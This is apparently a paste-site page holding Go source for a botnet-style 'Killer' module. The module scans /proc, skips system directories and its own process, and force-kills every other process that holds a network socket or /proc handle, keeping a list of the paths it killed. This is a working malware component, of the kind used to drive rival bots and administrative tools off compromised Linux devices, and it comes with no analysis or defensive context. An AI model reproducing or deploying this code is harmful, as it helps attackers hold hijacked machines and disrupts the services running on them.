Untitled
unknown
golang
a year ago
2.9 kB
23
Indexable
Never
package main import ( "fmt" "io/ioutil" "os" "path/filepath" "strconv" "strings" "syscall" ) type Killer struct { RealPath string } var killers []Killer func CheckPaths(file, path string) bool { if strings.HasPrefix(file, "/lib/") || strings.HasPrefix(file, "/sbin/") || strings.HasPrefix(file, "/usr/") || file == path { return true } return false } func FindRealPath(file string) bool { for _, k := range killers { if strings.Contains(k.RealPath, file) { return true } } return false } func AddProcess(file string) { killers = append(killers, Killer{RealPath: file}) } func KillProcess(pid int) error { return syscall.Kill(pid, syscall.SIGKILL) } func ShootList(realPath string) { pids, err := ioutil.ReadDir("/proc") if err != nil { return } for _, pidEntry := range pids { pid, err := strconv.Atoi(pidEntry.Name()) if err != nil || pid == os.Getpid() || pid == os.Getppid() { continue } exePath, err := os.Readlink(filepath.Join("/proc", pidEntry.Name())) if err != nil { continue } if CheckPaths(exePath, realPath) { continue } fdDir := filepath.Join("/proc", pidEntry.Name(), "fd") fdEntries, err := ioutil.ReadDir(fdDir) if err != nil { continue } for _, fdEntry := range fdEntries { fdPath, err := os.Readlink(filepath.Join(fdDir, fdEntry.Name())) if err != nil { continue } if strings.Contains(fdPath, "socket:") || strings.Contains(fdPath, "/proc") { if err := KillProcess(pid); err == nil { fmt.Printf("[Killer] Found and killed process %d - Path: %s\n", pid, exePath) if !FindRealPath(exePath) { AddProcess(exePath) } break } } } } } func Start(realPath string) { procDir := "/proc" pids, err := ioutil.ReadDir(procDir) if err != nil { return } for _, pidEntry := range pids { pid, err := strconv.Atoi(pidEntry.Name()) if err != nil || pid == os.Getpid() || pid == os.Getppid() { continue } exePath, err := os.Readlink(filepath.Join(procDir, pidEntry.Name(), "exe")) if err != nil { continue } if CheckPaths(exePath, realPath) { continue } fdDir := filepath.Join(procDir, pidEntry.Name(), "fd") fdEntries, err := ioutil.ReadDir(fdDir) if err != nil { continue } for _, fdEntry := range fdEntries { fdPath, err := os.Readlink(filepath.Join(fdDir, fdEntry.Name())) if err != nil { continue } if strings.Contains(fdPath, "socket:") || strings.Contains(fdPath, "/proc") { if err := KillProcess(pid); err == nil { fmt.Printf("[Killer] Found and killed process %d - Path: %s\n", pid, exePath) AddProcess(exePath) break } } } } ShootList(realPath) } func StartKiller() { executablePath, err := os.Executable() if err != nil { return } realPath, err := filepath.Abs(executablePath) if err != nil { return } Start(realPath) }